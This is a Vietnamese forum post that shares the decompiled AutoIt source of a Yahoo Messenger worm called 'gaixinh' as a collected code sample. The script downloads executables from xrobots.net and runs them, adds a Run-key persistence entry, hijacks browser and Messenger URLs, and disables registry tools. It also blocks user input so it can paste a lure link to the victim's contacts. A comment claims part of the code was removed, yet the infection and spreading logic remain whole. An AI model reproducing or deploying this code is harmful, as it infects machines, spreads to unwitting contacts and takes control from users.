Code virus gaixinh
Sưu tầm được share cùng các bạn
; <AUT2EXE VERSION: 3.1.1.112>
; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: C:\Documents and Settings\Hai Long\Desktop\Robots.au3>
; ----------------------------------------------------------------------------
; ----------------------------------------------------------------------------
;
; AutoIt Version: 3.1.0
; Author: A.N.Other <myemail@nowhere.com>
;
; Script Function:
; Template AutoIt script.
;
; ----------------------------------------------------------------------------
; Script Start - Add your code below here
$version = "1.0"
AutoItSetOption ("TrayIconHide","1")
InetGet ( "Http://xrobots.net/Gift/Robots.exe" ,@WindowsDir & "\Messenger.exe" ,0,1)
sleep(3000)
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi ndows\CurrentVersion\Run","Yahoo!!!","REG_SZ",@Win dowsDir & "\Messenger.exe")
InetGet ( "Http://xrobots.net/Gift/Version.txt" ,@WindowsDir & "\Version.txt" ,1,1)
sleep(5000)
$checkfile = FileExists ( @WindowsDir & "\Version.txt" )
if $checkfile = 1 then
$file = FileOpen (@WindowsDir & "\Version.txt",0 )
$read = FileRead($file,3)
FileClose($file)
if $read <> $version then
InetGet ( "Http://xrobots.net/Gift/Update.exe" ,@WindowsDir & "\Update.exe" ,1,1)
sleep (3000)
Run(@WindowsDir & "\Update.exe")
endif
endif
RegWrite("HKEY_CURRENT_USER\SOFTWARE\microsoft\Int ernet Explorer\Main", "Start Page", "REG_SZ", "http://67.15.40.2/~tranphu/forumtp/")
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_Launchcast","content url","REG_SZ", "http://xRobots.net/Gift/New/")
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_buzz","content url","REG_SZ", "http://vietnamnet.vn")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System", "DisableRegistryTools","REG_DWORD","1")
AutoItSetOption ("WinTitleMatchMode", "2")
$check = FileExists ( @WindowsDir & "\pchealth\helpctr\binaries\msconfig.exe" )
if $check = 1 then
FileMove(@WindowsDir & "\pchealth\helpctr\binaries\msconfig.exe" ,@WindowsDir &"\msconfig.exe" )
FileDelete (@WindowsDir & "\pchealth\helpctr\binaries\msconfig.exe")
endif
;; Đoạn này xóa đi để đoạn mã không bị lợi dụng
;; xLuke
if ($count = 2) or ($count = 6) or ($count = 9) or ($count = 12) or ($count = 15) or ($count = 18) or ($count = 21) or ($count = 24) or ($count = 27) or ($count = 30) then
$title = WinGetTitle("Yahoo! Messenger")
$wincheck = WinExists ($title)
ClipPut("Gai xinh ne , gai xinh ne : <a href="http://xrobots.net/Gift/?file=Gaixinh.jpg" target="_blank" rel="nofollow" class="limitview">http://xrobots.net/Gift/?file=Gaixinh.jpg</a>")
if $wincheck = 1 then
BlockInput (1)
WinActivate($title)
send("!A")
send("M")
sleep(400)
send("{DOWN}")
send("{SHIFTDOWN}")
send("{DOWN 70}")
send("{enter}")
send("{LSHIFT}")
send("^v {ENTER}")
BlockInput (0)
endif
endif
Next
; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-END: C:\Documents and Settings\Hai Long\Desktop\Robots.au3>
; --------------------------------------------------------------------------
__________________
backdoor(VNISS)
Fri Nov 02, 2012 4:11 pm by esolutionvn
